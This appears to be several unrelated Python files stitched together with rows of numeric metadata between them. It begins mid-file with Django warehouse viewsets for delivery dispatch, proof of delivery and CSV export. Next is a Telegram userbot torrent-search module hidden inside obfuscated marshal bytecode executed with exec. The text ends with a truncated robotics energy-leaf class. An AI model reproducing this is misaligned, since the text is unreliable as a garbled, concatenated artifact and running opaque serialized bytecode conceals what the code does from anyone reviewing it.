goods_code=str(data['goodsData'][j].get('goods_code'))).first()
bin_qty_change = stockbin.objects.filter(openid=self.request.auth.openid,
t_code=str(data['goodsData'][j].get('t_code'))).first()
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
t_code=str(
data['goodsData'][j].get('t_code'))).first()
qtychangerecorder.objects.create(openid=self.request.auth.openid,
mode_code=dn_detail.dn_code,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
goods_qty=0 - int(data['goodsData'][j].get('pick_qty')),
creater=self.request.auth.name
)
cur_date = timezone.now().date()
bin_stock = stockbin.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
).aggregate(sum=Sum('goods_qty'))["sum"]
cycle_qty = bin_stock - int(data['goodsData'][j].get('pick_qty'))
cyclecount.objects.filter(openid=self.request.auth.openid,
bin_name=bin_qty_change.bin_name,
goods_code=bin_qty_change.goods_code,
create_time__gte=cur_date).update(goods_qty=cycle_qty)
if int(data['goodsData'][j].get('pick_qty')) == pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - int(
data['goodsData'][j].get('pick_qty'))
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(
data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
elif int(data['goodsData'][j].get('pick_qty')) < pick_qty_change.pick_qty:
goods_qty_change.pick_stock = goods_qty_change.pick_stock - dn_detail.pick_qty
goods_qty_change.picked_stock = goods_qty_change.picked_stock + int(
data['goodsData'][j].get('pick_qty'))
pick_qty_change.picked_qty = int(data['goodsData'][j].get('pick_qty'))
bin_qty_change.pick_qty = bin_qty_change.pick_qty - pick_qty_change.pick_qty
bin_qty_change.picked_qty = bin_qty_change.picked_qty + int(data['goodsData'][j].get('pick_qty'))
goods_qty_change.save()
pick_qty_change.save()
bin_qty_change.save()
dn_detail.picked_qty = dn_detail.picked_qty + int(data['goodsData'][j].get('pick_qty'))
if dn_detail.dn_status == 3:
dn_detail.dn_status = 4
if dn_detail.pick_qty > 0:
dn_detail.pick_qty = 0
dn_detail.save()
qs.save()
return Response({"Detail": "success"}, status=200)
class DnDispatchViewSet(viewsets.ModelViewSet):
"""
create:
Confirm Dispatch
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.dn_status != 4:
raise APIException({"detail": "This DN Status Not Picked"})
else:
qs.dn_status = 5
data = self.request.data
if driverlist.objects.filter(openid=self.request.auth.openid,
is_delete=False).exists():
driver = driverlist.objects.filter(openid=self.request.auth.openid,
driver_name=str(data['driver']),
is_delete=False).first()
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
dn_status=4, customer=qs.customer,
)
pick_qty_change = PickingListModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']))
for i in range(len(dn_detail)):
goods_qty_change = stocklist.objects.filter(openid=self.request.auth.openid,
goods_code=dn_detail[i].goods_code).first()
goods_qty_change.goods_qty = goods_qty_change.goods_qty - dn_detail[i].picked_qty
goods_qty_change.onhand_stock = goods_qty_change.onhand_stock - dn_detail[i].picked_qty
goods_qty_change.picked_stock = goods_qty_change.picked_stock - dn_detail[i].picked_qty
dn_detail[i].dn_status = 5
dn_detail[i].intransit_qty = dn_detail[i].picked_qty
dn_detail[i].save()
goods_qty_change.save()
if goods_qty_change.goods_qty == 0 and goods_qty_change.back_order_stock == 0:
goods_qty_change.delete()
for j in range(len(pick_qty_change)):
bin_qty_change = stockbin.objects.filter(openid=self.request.auth.openid,
goods_code=pick_qty_change[j].goods_code,
bin_name=pick_qty_change[j].bin_name).first()
bin_qty_change.goods_qty = bin_qty_change.goods_qty - pick_qty_change[j].picked_qty
if bin_qty_change.goods_qty == 0:
bin_qty_change.delete()
if stockbin.objects.filter(openid=self.request.auth.openid,
bin_name=pick_qty_change[j].bin_name).exists():
pass
else:
binset.objects.filter(openid=self.request.auth.openid,
bin_name=pick_qty_change[j].bin_name).update(empty_label=True)
else:
bin_qty_change.picked_qty = bin_qty_change.picked_qty - pick_qty_change[j].picked_qty
bin_qty_change.save()
driverdispatch.objects.create(openid=self.request.auth.openid,
driver_name=driver.driver_name,
dn_code=str(data['dn_code']),
contact=driver.contact,
creater=self.request.auth.name)
qs.save()
return Response({"detail": "success"}, status=200)
else:
raise APIException({"detail": "Driver Does Not Exists"})
class DnPODViewSet(viewsets.ModelViewSet):
"""
create:
Confirm Dispatch
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['create']:
return serializers.DNListUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, pk):
qs = self.get_object()
if qs.dn_status != 5:
raise APIException({"detail": "This DN Status Not Intran-Sit"})
else:
qs.dn_status = 6
data = self.request.data
for i in range(len(data['goodsData'])):
delivery_damage_qty = data['goodsData'][i].get('delivery_damage_qty')
delivery_actual_qty = data['goodsData'][i].get('intransit_qty')
if delivery_actual_qty < 0:
raise APIException({"detail": "Delivery Actual QTY Must >= 0"})
else:
if delivery_damage_qty < 0:
raise APIException({"detail": "Delivery Damage QTY Must >= 0"})
dn_detail = DnDetailModel.objects.filter(openid=self.request.auth.openid,
dn_code=str(data['dn_code']),
dn_status=5, customer=qs.customer,
)
for j in range(len(data['goodsData'])):
delivery_damage_qty = data['goodsData'][j].get('delivery_damage_qty')
delivery_actual_qty = data['goodsData'][j].get('intransit_qty')
goods_code = data['goodsData'][j].get('goods_code')
if delivery_damage_qty > 0:
goods_detail = dn_detail.filter(goods_code=goods_code).first()
if delivery_actual_qty > goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_more_qty = delivery_actual_qty - goods_detail.intransit_qty
goods_detail.delivery_damage_qty = delivery_damage_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty < goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_shortage_qty = goods_detail.intransit_qty - delivery_actual_qty
goods_detail.delivery_damage_qty = delivery_damage_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty == goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_damage_qty = delivery_damage_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
else:
continue
goods_detail.save()
elif delivery_damage_qty == 0:
goods_detail = dn_detail.filter(goods_code=goods_code).first()
if delivery_actual_qty > goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_more_qty = delivery_actual_qty - goods_detail.intransit_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty < goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.delivery_shortage_qty = goods_detail.intransit_qty - delivery_actual_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
elif delivery_actual_qty == goods_detail.intransit_qty:
goods_detail.delivery_actual_qty = delivery_actual_qty
goods_detail.intransit_qty = 0
goods_detail.dn_status = 6
else:
continue
goods_detail.save()
qs.save()
return Response({"detail": "success"}, status=200)
class FileListDownloadView(viewsets.ModelViewSet):
renderer_classes = (FileListRenderCN, ) + tuple(api_settings.DEFAULT_RENDERER_CLASSES)
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnListFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list']:
return serializers.FileListRenderSerializer
else:
return self.http_method_not_allowed(request=self.request)
def get_lang(self, data):
lang = self.request.META.get('HTTP_LANGUAGE')
if lang:
if lang == 'zh-hans':
return FileListRenderCN().render(data)
else:
return FileListRenderEN().render(data)
else:
return FileListRenderEN().render(data)
def list(self, request, *args, **kwargs):
from datetime import datetime
dt = datetime.now()
data = (
FileListRenderSerializer(instance).data
for instance in self.filter_queryset(self.get_queryset())
)
renderer = self.get_lang(data)
response = StreamingHttpResponse(
renderer,
content_type="text/csv"
)
response['Content-Disposition'] = "attachment; filename='dnlist_{}.csv'".format(str(dt.strftime('%Y%m%d%H%M%S%f')))
return response
class FileDetailDownloadView(viewsets.ModelViewSet):
renderer_classes = (FileDetailRenderCN, ) + tuple(api_settings.DEFAULT_RENDERER_CLASSES)
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = DnDetailFilter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return DnDetailModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return DnDetailModel.objects.none()
def get_serializer_class(self):
if self.action in ['list']:
return serializers.FileDetailRenderSerializer
else:
return self.http_method_not_allowed(request=self.request)
def get_lang(self, data):
lang = self.request.META.get('HTTP_LANGUAGE')
if lang:
if lang == 'zh-hans':
return FileDetailRenderCN().render(data)
else:
return FileDetailRenderEN().render(data)
else:
return FileDetailRenderEN().render(data)
def list(self, request, *args, **kwargs):
from datetime import datetime
dt = datetime.now()
data = (
FileDetailRenderSerializer(instance).data
for instance in self.filter_queryset(self.get_queryset())
)
renderer = self.get_lang(data)
response = StreamingHttpResponse(
renderer,
content_type="text/csv"
)
response['Content-Disposition'] = "attachment; filename='dndetail_{}.csv'".format(str(dt.strftime('%Y%m%d%H%M%S%f')))
return response
| 65.001485
| 150
| 0.467529
| 12,020
| 131,303
| 4.746339
| 0.025874
| 0.039018
| 0.038913
| 0.038054
| 0.923928
| 0.908538
| 0.898056
| 0.887136
| 0.880353
| 0.875217
| 0
| 0.004344
| 0.463577
| 131,303
| 2,019
| 151
| 65.03368
| 0.805648
| 0.004356
| 0
| 0.844645
| 0
| 0
| 0.031182
| 0.001442
| 0
| 0
| 0
| 0
| 0
| 1
| 0.030223
| false
| 0.002651
| 0.018558
| 0
| 0.144221
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6d79e29b3200be71dac36805e781dc38e956d00
| 8,923
|
py
|
Python
|
userbot/modules/torrentsearch.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/torrentsearch.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
userbot/modules/torrentsearch.py
|
oxyda-fox/XBot-Remix
|
3d97bea5395b223fc89a8cc6cb699cc624ccc967
|
[
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null |
#Encript Marshal By XVenom
#https://github.com/xvenom15
import marshal
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\x8a\x00\x00\x00d\x00d\x01l\x00Z\x00d\x00d\x01l\x01Z\x01d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x02l\x04m\x05Z\x06\x01\x00d\x00d\x03l\x07m\x08Z\x08m\tZ\t\x01\x00d\x00d\x04l\nm\x0bZ\x0b\x01\x00e\x0bd\x05d\x06d\x07\x8d\x02d\x08d\t\x84\x00\x83\x01Z\x0cd\nd\x0b\x84\x00Z\re\x0bd\x05d\x0cd\x07\x8d\x02d\rd\x0e\x84\x00\x83\x01Z\x0ee\x08\xa0\x0fd\x0fd\x10i\x01\xa1\x01\x01\x00d\x01S\x00)\x11\xe9\x00\x00\x00\x00N)\x01\xda\rBeautifulSoup)\x02\xda\x08CMD_HELP\xda\x17TEMP_DOWNLOAD_DIRECTORY)\x01\xda\x08registerTz\n^\\.ts (.*))\x02Z\x08outgoingZ\x07patternc\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\t\x00\x00\x00\xc3\x00\x00\x00s\x84\x01\x00\x00|\x00\xa0\x00d\x01\xa1\x01I\x00d\x00H\x00\x01\x00|\x00j\x01\xa0\x02d\x02\xa1\x01}\x01t\x03\xa0\x04d\x03|\x01\x9b\x00\x9d\x02\xa1\x01}\x02t\x05\xa0\x06|\x02j\x07\xa1\x01}\x03|\x03|\x02\xa0\x05\xa1\x00k\x03rX|\x00\xa0\x00d\x04\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00d\x05}\x04d\x06}\x05zD|\x05d\x027\x00}\x05|\x03|\x05\x19\x00}\x06d\x07\xa0\x08|\x05|\x06d\x08\x19\x00|\x06d\t\x19\x00|\x06d\n\x19\x00|\x06d\x0b\x19\x00|\x06d\x0c\x19\x00\xa1\x06}\x07|\x04|\x077\x00}\x04W\x00q`\x04\x00t\tk\nr\xbc\x01\x00\x01\x00\x01\x00Y\x00q\xc0Y\x00q`X\x00q`|\x04s\xd4|\x00\xa0\x00d\r\xa1\x01I\x00d\x00H\x00S\x00t\n\x9b\x00d\x0e|\x01\x9b\x00d\x0f\x9d\x04}\x08t\x0b|\x08d\x10d\x11d\x12\x8d\x03\x8f\x14}\t|\t\xa0\x0ct\r|\x04\x83\x01\xa1\x01\x01\x00W\x005\x00Q\x00R\x00X\x00t\x0ej\x0b|\x08d\x13d\x14d\x12\x8d\x03}\n|\n\xa0\x0f\xa1\x00}\x0bt\x03j\x10d\x15d\x16|\x0bi\x01d\x17\x8d\x02\xa0\x05\xa1\x00\xa0\x04d\x18\xa1\x01\xa0\x04d\x19\xa1\x01}\x0cd\x1a|\x0c\x9b\x00\x9d\x02}\rd\x1b|\x01\x9b\x00d\x1c|\r\x9b\x00d\x1d\x9d\x05}\x0et\x11\xa0\x12|\x08\xa1\x01\x01\x00|\x00j\x00|\x0ed\x1ed\x1f\x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00) Nz"`Please wait, fetching results...`\xe9\x01\x00\x00\x00z3https://sjprojectsapi.herokuapp.com/torrent/?query=z(**Some error occured**\n`Try Again Later`\xda\x00r\x01\x00\x00\x00zM<-----{}----->\nName: {}\nSeeders: {}\nSize: {}\nAge: {}\n<--Magnet Below-->\n{}\n\n\n\xda\x04nameZ\x06seeder\xda\x04sizeZ\x03ageZ\x06magnetz\x19`Error: No results found`\xfa\x01/z\x04.txtz\x02w+\xda\x04utf8)\x01\xda\x08encoding\xda\x01rz\x05utf-8z!https://nekobin.com/api/documentsZ\x07content)\x01\xda\x04json\xda\x06result\xda\x03keyz\x18https://nekobin.com/raw/z!`Here the results for the query: z\x18`\n\nPasted to: [Nekobin](\xfa\x01)F\xa9\x01Z\x0clink_preview)\x13\xda\x04edit\xda\rpattern_match\xda\x05group\xda\x08requests\xda\x03getr\x0e\x00\x00\x00\xda\x05loads\xda\x04text\xda\x06format\xda\rBaseExceptionr\x04\x00\x00\x00\xda\x04open\xda\x05write\xda\x03str\xda\x06codecs\xda\x04read\xda\x04post\xda\x02os\xda\x06remove)\x0f\xda\x01eZ\x05queryZ\x08responseZ\x02tsZ\x08listdata\xda\x03runZ\x02r1Z\x05list1Z\ttsfilelocZ\x08out_file\xda\x02fd\xda\x04datar\x10\x00\x00\x00\xda\x03urlZ\x07caption\xa9\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\tgengkapak\x0c\x00\x00\x00sV\x00\x00\x00\x00\x02\x10\x01\x0c\x01\x04\x01\x08\xff\x04\x03\x0c\x01\x0c\x01\x10\x01\x04\x01\x04\x01\x04\x02\x02\x01\x08\x01\x08\x01\x04\x01\x02\x00\x06\x00\x06\x00\x06\x00\x06\x00\x06\xff\x04\x02\x0c\x01\x0e\x01\x0c\x02\x04\x01\x10\x02\x10\x01\x10\x01\x18\x01\x10\x01\x08\x01\x06\x01\x06\xff\n\x01\x02\xff\x04\x01\x02\xff\x04\x02\n\x01\x12\x01\n\x01r*\x00\x00\x00c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s^\x00\x00\x00d\x01}\x01g\x00}\x02|\x01t\x00|\x00\x83\x01k\x03rZ|\x00|\x01\x19\x00}\x03d\x02}\x04t\x01j\x02|\x04|\x03\xa0\x03d\x03\xa1\x01d\x04\x8d\x02\xa0\x04\xa1\x00}\x05d\x05|\x05d\x06\x19\x00\x9b\x00\x9d\x02}\x04|\x02\xa0\x05|\x04\xa1\x01\x01\x00|\x01d\x077\x00}\x01q\x08|\x02S\x00)\x08Nr\x01\x00\x00\x00z\x19https://del.dog/documentsz\x05UTF-8)\x01r\'\x00\x00\x00z\x14https://del.dog/raw/r\x10\x00\x00\x00r\x06\x00\x00\x00)\x06\xda\x03lenr\x16\x00\x00\x00r!\x00\x00\x00\xda\x06encoder\x0e\x00\x00\x00\xda\x06append)\x06\xda\x07magnets\xda\x07counter\xda\x04urls\xda\x07messager(\x00\x00\x00r\r\x00\x00\x00r)\x00\x00\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\x06dogbin3\x00\x00\x00s\x14\x00\x00\x00\x00\x01\x04\x01\x04\x01\x0c\x01\x08\x01\x04\x01\x18\x01\x0e\x01\n\x01\n\x01r2\x00\x00\x00z\x10^.tos(?: |$)(.*)c\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\n\x00\x00\x00\xc3\x00\x00\x00s|\x02\x00\x00|\x00j\x00r\nd\x00S\x00d\x01d\x02i\x01}\x01|\x00j\x01\xa0\x02d\x03\xa1\x01}\x02t\x03|\x02\x83\x01\x01\x00|\x00\xa0\x04d\x04|\x02\x17\x00d\x05\x17\x00\xa1\x01I\x00d\x00H\x00\x01\x00d\x06|\x02k\x06rl|\x02\xa0\x05d\x06d\x07\xa1\x02}\x02t\x03|\x02\x83\x01\x01\x00t\x06\xa0\x07d\x08|\x02\x17\x00|\x01\xa1\x02}\x03n\x10t\x06\xa0\x07d\t|\x02\x17\x00|\x01\xa1\x02}\x03t\x08|\x03j\td\n\x83\x02}\x04g\x00}\x05g\x00}\x06g\x00}\x07d\x0b}\x08|\x04\xa0\nd\x0cd\rd\x0ei\x01\xa1\x02D\x00]\x96}\tz<|\tj\x0bj\x0cd\x0f\x19\x00}\n|\nd\x10d\x00\x85\x02\x19\x00}\n|\x07\xa0\r|\n\xa1\x01\x01\x00|\x05\xa0\rd\x11|\tj\x0bj\x0cd\x12\x19\x00\x17\x00\xa1\x01\x01\x00W\x00n<\x04\x00t\x0ek\nr\xfc\x01\x00\x01\x00\x01\x00Y\x00n*\x04\x00t\x0fk\n\x90\x01r\x10\x01\x00\x01\x00\x01\x00Y\x00n\x16\x04\x00t\x10k\n\x90\x01r$\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00|\x08d\x13k\x02\x90\x01r6\x01\x00\x90\x01q@|\x08d\x037\x00}\x08q\xa8|\x05\x90\x01sZ|\x00\xa0\x04d\x14\xa1\x01I\x00d\x00H\x00\x01\x00d\x00S\x00t\x03d\x15\x83\x01\x01\x00|\x05D\x00]h}\x0bt\x06\xa0\x07|\x0b|\x01\xa1\x02}\x03t\x08|\x03j\td\n\x83\x02}\x04|\x04\xa0\nd\x0cd\rd\x16i\x01\xa1\x02D\x00]8}\tz\x1a|\tj\x0bj\x0cd\x12\x19\x00}\x0c|\x06\xa0\r|\x0c\xa1\x01\x01\x00W\x00n\x16\x04\x00t\x11k\n\x90\x01r\xc6\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00\x90\x01q\x92\x90\x01qft\x03d\x17\x83\x01\x01\x00t\x12|\x06\x83\x01}\rt\x03d\x18\x83\x01\x01\x00d\x19}\x0ez\x10|\x02\xa0\x05d\x07d\x06\xa1\x02}\x02W\x00n\x16\x04\x00t\x13k\n\x90\x02r\x12\x01\x00\x01\x00\x01\x00Y\x00n\x02X\x00d\x1a\xa0\x14|\x02\xa1\x01d\x1b\x17\x00}\x0ed\x0b}\x08|\x08t\x15|\x07\x83\x01k\x03\x90\x02rd|\x0ed\x1c\xa0\x14|\x07|\x08\x19\x00\xa1\x01\x17\x00d\x1d\xa0\x14|\r|\x08\x19\x00\xa1\x01\x17\x00d\x1e\x17\x00}\x0e|\x08d\x037\x00}\x08\x90\x02q&|\x00j\x04|\x0ed\x1fd \x8d\x02I\x00d\x00H\x00\x01\x00d\x00S\x00)!Nz\nUser-AgentziMozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36r\x06\x00\x00\x00z\x0eSearching for z\x05.....\xfa\x01 \xfa\x01+z=https://www.torrentdownloads.me/search/?new=1&s_cat=0&search=z/https://www.torrentdownloads.me/search/?search=Z\x04lxmlr\x01\x00\x00\x00\xda\x03divZ\x05classz\x13grey_bar3 back_none\xda\x05title\xe9\x14\x00\x00\x00z\x1fhttps://www.torrentdownloads.meZ\x04href\xe9\x0b\x00\x00\x00z0Either the Keyword was restricted or not found..z\rFound URLS...z\x13grey_bar1 back_nonez\x10Found Magnets...z\x1cDogged Magnets to del.dog...r\x07\x00\x00\x00z\x1d**Torrent Search Query**\n`{}`z\r\n**Results**\nu\x08\x00\x00\x00\xe2\x81\x8d [{}]z\x04({})z\x02\n\nFr\x12\x00\x00\x00)\x16Z\x08fwd_fromr\x14\x00\x00\x00r\x15\x00\x00\x00\xda\x05printr\x13\x00\x00\x00\xda\x07replacer\x16\x00\x00\x00r\x17\x00\x00\x00\xda\x02bsr\x19\x00\x00\x00Z\x08find_all\xda\x01p\xda\x01ar-\x00\x00\x00\xda\x08KeyError\xda\tTypeError\xda\x0eAttributeError\xda\tExceptionr2\x00\x00\x00r\x1b\x00\x00\x00r\x1a\x00\x00\x00r+\x00\x00\x00)\x0fZ\x05eventZ\x07headersZ\nsearch_strZ\x03res\xda\x06sourcer0\x00\x00\x00r.\x00\x00\x00Z\x06titlesr/\x00\x00\x00r5\x00\x00\x00r6\x00\x00\x00r(\x00\x00\x00Z\x02mgZ\rshorted_links\xda\x03msgr)\x00\x00\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\ntor_search@\x00\x00\x00s\x9c\x00\x00\x00\x00\x02\x06\x01\x04\x02\x02\x00\x02\xff\x04\x03\x0c\x02\x08\x01\x18\x01\x08\x01\x0c\x01\x08\x01\x04\x01\x02\x01\x02\xff\x02\x02\x02\xfd\x06\x06\x04\x01\x02\x01\x02\xff\x02\x02\x02\xfd\x04\x05\x0c\x01\x04\x01\x04\x01\x04\x01\x04\x01\x14\x02\x02\x01\x0c\x01\x0c\x01\n\x01\x1a\x01\x0e\x01\x04\x01\x10\x01\x04\x01\x10\x01\x06\x01\n\x01\x06\x01\n\x01\x06\x01\x10\x01\x04\x02\x08\x01\x08\x01\x0c\x02\x0c\x01\x14\x01\x02\x01\x0c\x01\x0e\x01\x10\x01\x0e\x01\x08\x01\x08\x01\x08\x01\x04\x01\x02\x01\x10\x01\x10\x01\x06\x01\x04\x01\x02\xff\x02\x01\x02\xff\x04\x02\x04\x01\x0e\x01\x10\x01\x0c\xff\x02\x01\x02\xff\x04\x02\x0c\x01rD\x00\x00\x00Z\x07torrentz\x97`.ts` **Query** \nUsage: Search for torrent query and display results. \n\n`.tos` **Query** \nUsage: Search for torrent query and display results.)\x10r\x1f\x00\x00\x00r\x0e\x00\x00\x00r"\x00\x00\x00r\x16\x00\x00\x00Z\x03bs4r\x02\x00\x00\x00r;\x00\x00\x00Z\x07userbotr\x03\x00\x00\x00r\x04\x00\x00\x00Z\x0euserbot.eventsr\x05\x00\x00\x00r*\x00\x00\x00r2\x00\x00\x00rD\x00\x00\x00\xda\x06updater)\x00\x00\x00r)\x00\x00\x00r)\x00\x00\x00r\x07\x00\x00\x00\xda\x08<module>\x03\x00\x00\x00s\x1e\x00\x00\x00\x08\x01\x08\x01\x08\x01\x08\x01\x0c\x01\x10\x01\x0c\x03\n\x01\n&\x08\r\n\x01\nN\x04\x01\x02\x01\x02\xfe'))
| 2,230.75
| 8,852
| 0.751877
| 1,872
| 8,923
| 3.574786
| 0.21688
| 0.153317
| 0.103556
| 0.075314
| 0.272116
| 0.225941
| 0.173939
| 0.125672
| 0.101315
| 0.073371
| 0
| 0.324275
| 0.010198
| 8,923
| 4
| 8,852
| 2,230.75
| 0.433424
| 0.005828
| 0
| 0
| 0
| 0.5
| 0.433033
| 0.226381
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
|
0
| 9
|
fc04615fb3a0adb91f1a7643930c3ccaef2ece2b
| 26,120
|
py
|
Python
|
cep/energies/goto_leafs.py
|
hjw-1014/Multi-Objective-Reactive-Motion-Planning-in-Mobile-Manipulators
|
9a8801e9c663174b753c4852b2313c5a3f302434
|
[
"MIT"
] | null | null | null |
cep/energies/goto_leafs.py
|
hjw-1014/Multi-Objective-Reactive-Motion-Planning-in-Mobile-Manipulators
|
9a8801e9c663174b753c4852b2313c5a3f302434
|
[
"MIT"
] | null | null | null |
cep/energies/goto_leafs.py
|
hjw-1014/Multi-Objective-Reactive-Motion-Planning-in-Mobile-Manipulators
|
9a8801e9c663174b753c4852b2313c5a3f302434
|
[
"MIT"
] | null | null | null |
import math
import os
import torch
import torch.distributions as tdist
import numpy as np
import cascade_control_dx
from .energy_leaf import EnergyLeaf
from .energy_leaf import EnergyLeaf_x
#from _utils import torch2numpy
from cep.utils import eul2rot, rot2eul, rot2quat
from cep.liegroups.torch import SO3, SE3
from icecream import ic
import matplotlib.pyplot as plt
import time
global num
num = 2
global closest_points
closest_points = []
global count
count = 1
global CREATE_DIR
CREATE_DIR = False
global path
path = ""
def torch2numpy(x):
if x is None:
print(x)
if x.device.type == 'cuda':
return x.cpu().detach().numpy()
else:
return x.detach().numpy()
class TaskGoToLeaf(EnergyLeaf):
def __init__(self, dim=6, A = None, b = None, R = None, var=None):
super(TaskGoToLeaf, self).__init__()
self.dim = dim
if A is None:
A = torch.eye(self.dim).float()
self.register_buffer('A', A)
if b is None:
b = torch.zeros(3).float()
self.register_buffer('b', b)
if var is None:
var = torch.eye(self.dim).float() * 1.
self.register_buffer('var', var)
if R is None:
R = torch.eye(3).float()
R_inv = torch.inverse(R)
self.register_buffer('R', R)
self.register_buffer('R_inv', R_inv)
## variables for computation ##
self.p_dx = None
def set_context(self, state):
'''
We compute the conditioning variables of our model to have a faster optimization
'''
x = state[0] # Tensor(4, 4), end-effector rotation and position SE(3)
v = state[1] # Tensor (1, 6), end-effector spatial velocity V_b
#print('state:', state)
# print('x: ', x)
# print('v: ', v)
#print('self.R_inv: ', self.R_inv) # Tensor (4, 4)
#print('R: ', self.R) # Tensor (4, 4)
Htl = torch.matmul(self.R_inv, x) # R_inv * X
#print('Htl: ', Htl)
Xe = SE3.from_matrix(Htl) # <cep.liegroups.torch.se3.SE3Matrix>, SE(3)
#print('Xe: ', Xe)
xtl = Xe.log() # Tensor(1, 6), (omega, V)
#print('xtl: ', xtl)
vtl = -xtl
A = SE3.from_matrix(self.R) # <cep.liegroups.torch.se3.SE3Matrix>, SE(3), R
#print('A: ', A)
Adj_lw = A.adjoint() # Adjoint map (Spatial velocity from one frame to another frame), Tensor (6,6),
#print('Adj_lw: ', Adj_lw)
ve_w = torch.matmul(Adj_lw, vtl) # Tensor(6, 1)
#print('v_ew: ', ve_w)
###########################################
scale = 20.
mu = scale * ve_w - 1.2 * scale * v
#print('mu: ', mu) # Tensor(6, 1)
